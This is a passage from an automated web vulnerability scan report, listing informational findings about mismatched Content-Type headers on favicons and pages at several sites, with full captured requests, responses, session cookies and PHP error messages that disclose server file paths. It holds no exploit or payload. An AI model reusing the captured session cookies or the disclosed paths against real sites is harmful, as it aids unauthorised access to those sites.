Set-Cookie: A3=gPVtafzY0bnA00001gSdsafy50aSU00003gSboahoy0aSU00002gLnTaeKR09sO00001h5j3afvK07l00000.h5iUafy507l00000SfFb9afAF02WG00001gDQzahdw07ZZ00001gYyfadw90cvM00001gDa8aeXd0aA900001gYRSaeKR09sO00001gL2MadKj0bdR00001hghLaeVW09SF00002g7VJafdh08.I00001h802ae7k0c6L00001gKXMaepH0bdR00001gFjwaeKR09sO00001gKXNaepP0bdR00001gYx+adw90cvM00001heXeahAp0c9M00003heXfagzX0c9M00001afPqahnP09NH00001gHrHaeKS09sO00001gSdkafvD0aSU00001h6moagvf0aMN00002heXgahod0c9M00003heXhahnM0c9M00004gK8raeXe0aA900001gSdmafy60aSU00002heXiagzX0c9M00004heXjahoy0c9M00002gSdnafwN0aSU00003hbwIaeVY09SF00002hAp8ahzF06OS00001gSdpafvK0aSU00001heXaaf9P0c9M00001hbxBahE507aw00001heXbahoZ0c9M00001g+nBaeUD02Hn00001gNQ4ae7r0c9M00001; expires=Sun, 15-May-2011 13:57:17 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=89PS000000000St88qiu0000000002t68bvZ0000000001t65p9W0000000001td89PT000000000.t87oaf0000000001t884fB0000000001t88fq40000000001t88fq50000000003t88bwx0000000001t48i440000000001t28mb20000000001t480Te0000000001te82790000000002t57PrH0000000001t78fq70000000001t886Bm0000000001t67dNH0000000002sZ8qav000000000atd8oiy0000000001te8j4q0000000001t67GHq0000000001s.84ZE0000000001t684ZF0000000002t67FCH0000000001s.8cVQ0000000001sV8nAl0000000002t682980000000001t384U10000000001t6852N0000000001s.8fq20000000003t88fpT0000000002td8fq30000000002t86o.Q0000000001sY87ma0000000001s.8i430000000001t28qaw0000000007te8qay0000000002td8n7e0000000002tb87H10000000001td; expires=Sun, 15-May-2011 13:57:17 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sun, 15-May-2011 13:57:17 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 14 Feb 2011 18:57:17 GMT
Connection: close
Content-Length: 1872

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

23.3. https://www-secure.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www-secure.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /connect/sites/default/themes/connect2/images/favicon.ico HTTP/1.1
Host: www-secure.symantec.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=123259657.1297710221.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26ACBE3E050135F4-4000010880054D66[CE]; __utma=123259657.27213714.1297710221.1297710221.1297710221.1; __utmc=123259657; __utmv=123259657.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=123259657.4.10.1297710221; SESSfb1d8525d94d660bc8f92b8419fd5ae1=0a7468d0124fbe8fc54c8398bc4f1e8d; lifb1d8525d94d660bc8f92b8419fd5ae1=T; s_pers=%20s_nr%3D1297710294234-New%7C1318446294234%3B%20event69%3Devent69%7C1318446294236%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dsymantecmysymantec%253D%252526pid%25253Dbiz%2525253A%25252520symaccount%2525253A%25252520member%25252520login%252526pidt%25253D1%252526oid%25253Djavascript%2525253Adocument.profile.submit%25252528%25252529%2525253B%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 05 Oct 2010 02:54:35 GMT
ETag: "a680e3-47e-491d5c7eb70c0"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Date: Mon, 14 Feb 2011 19:04:50 GMT
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 1150

............ .h.......(....... ..... .....@......................................>...........................................................q...................................9......................
...[SNIP]...

23.4. http://www.bericotechnologies.com/opportunities/dc-metro  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bericotechnologies.com
Path:   /opportunities/dc-metro

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /opportunities/dc-metro HTTP/1.1
Host: www.bericotechnologies.com
Proxy-Connection: keep-alive
Referer: http://www.bericotechnologies.com/berico-projects/coral-reef
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS3c4036a5947dcf60c7c1c31f914be361=9f5cadef4aa0a266b0ff7d08a7f3814d; __utmz=177377846.1297709462.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); has_js=1; __utma=177377846.1924676899.1297709462.1297709462.1297709462.1; __utmc=177377846; __utmb=177377846.2.10.1297709462; __utma_a2a=7724940235.1329266428.1297709502.1297709502.1297709502.1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:52:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 14 Feb 2011 18:52:48 GMT
Content-Type: text/html
Content-Length: 176

<br />
<b>Fatal error</b>: Out of memory (allocated 2621440) (tried to allocate 19456 bytes) in <b>/home/berico01/public_html/includes/theme.inc</b> on line <b>1540</b><br />

23.5. http://www.bericotechnologies.com/sites/all/themes/berico/images/news_bg.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bericotechnologies.com
Path:   /sites/all/themes/berico/images/news_bg.png

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /sites/all/themes/berico/images/news_bg.png HTTP/1.1
Host: www.bericotechnologies.com
Proxy-Connection: keep-alive
Referer: http://www.bericotechnologies.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS3c4036a5947dcf60c7c1c31f914be361=9f5cadef4aa0a266b0ff7d08a7f3814d; has_js=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:52:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 14 Feb 2011 18:52:46 GMT
Content-Type: text/html
Content-Length: 177

<br />
<b>Fatal error</b>: Out of memory (allocated 2097152) (tried to allocate 19456 bytes) in <b>/home/berico01/public_html/includes/common.inc</b> on line <b>1457</b><br />

23.6. http://www.hidglobal.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.hidglobal.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.hidglobal.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __utmz=10140716.1297708154.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=10140716.584761103.1297708154.1297708154.1297708154.1; __utmc=10140716; __utmb=10140716.1.10.1297708154

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:29:02 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 10 Oct 2009 01:15:12 GMT
ETag: "ac877a-57e-4758a6da04800"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ................................................x...Z...<..........................o.o.W.W.@.@..................w...Z...=... ..........s...d...U...F.o.7.W.(.@...........
...[SNIP]...

23.7. http://www.securitynewsdaily.com/templates/security_news_daily/images/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.securitynewsdaily.com
Path:   /templates/security_news_daily/images/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /templates/security_news_daily/images/favicon.ico HTTP/1.1
Host: www.securitynewsdaily.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a5e04250348ef9239c1cdf4824f43ad1=rdrk740li51o2pdl7k6r41odm1; __qca=P0-1506324868-1297709851878; __utmz=27158498.1297709852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27158498.1497794322.1297709852.1297709852.1297709852.1; __utmc=27158498; __utmb=27158498.1.10.1297709852; reaction_28=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:57:19 GMT
Server: Apache
Last-Modified: Tue, 05 Oct 2010 18:06:36 GMT
ETag: "c8ce042-47e-491e2858ba300"
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=ISO-8859-1
Content-Length: 1150

............ .h.......(....... ..... .....@......................0...........................................................0............................@@..@@........................................
...[SNIP]...

23.8. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /connect/sites/default/themes/connect2/images/favicon.ico HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1297710221017-New%7C1318446221017%3B%20event69%3Devent69%7C1318446221018%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=123259657.1297710221.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=123259657.27213714.1297710221.1297710221.1297710221.1; __utmc=123259657; __utmv=123259657.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=123259657.2.10.1297710221; s_vi=[CS]v1|26ACBE3E050135F4-4000010880054D66[CE]

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 05 Oct 2010 02:54:35 GMT
ETag: "90d026d-47e-491d5c7eb70c0"
Content-Type: text/plain; charset=UTF-8
X-Varnish: 1272390089
Vary: Accept-Encoding
Cache-Control: max-age=67
Date: Mon, 14 Feb 2011 19:03:26 GMT
Connection: close
Content-Length: 1150

............ .h.......(....... ..... .....@......................................>...........................................................q...................................9......................
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Mon Feb 14 13:59:42 CST 2011.